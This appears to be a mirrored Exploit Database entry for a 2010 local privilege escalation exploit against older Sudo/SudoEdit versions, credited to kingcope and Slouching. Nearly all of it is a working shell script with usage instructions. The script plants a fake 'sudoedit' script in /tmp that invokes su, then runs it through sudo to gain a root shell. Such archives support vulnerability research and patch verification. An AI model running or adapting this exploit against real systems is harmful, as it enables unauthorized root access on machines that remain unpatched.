(Tod Miller’s) Sudo/SudoEdit 1.6.9p21/1.7.2p4 – Local Privilege Escalation

• Exploit Database
• 13 阅读

• 作者： kingcope
  日期： 2010-03-07
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/11651/

• #!/bin/sh
  # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
  # local root exploit
  # March 2010
  # automated by kingcope
  # Full Credits to Slouching
  echo Tod Miller Sudo local root exploit
  echo by Slouching
  echo automated by kingcope
  if [ $# != 1 ]
  then
  echo "usage: ./sudoxpl.sh <file you have permission to edit>"
  exit
  fi
  cd /tmp
  cat > sudoedit << _EOF
  #!/bin/sh
  echo ALEX-ALEX
  su
  /bin/su
  /usr/bin/su
  _EOF
  chmod a+x ./sudoedit
  sudo ./sudoedit $1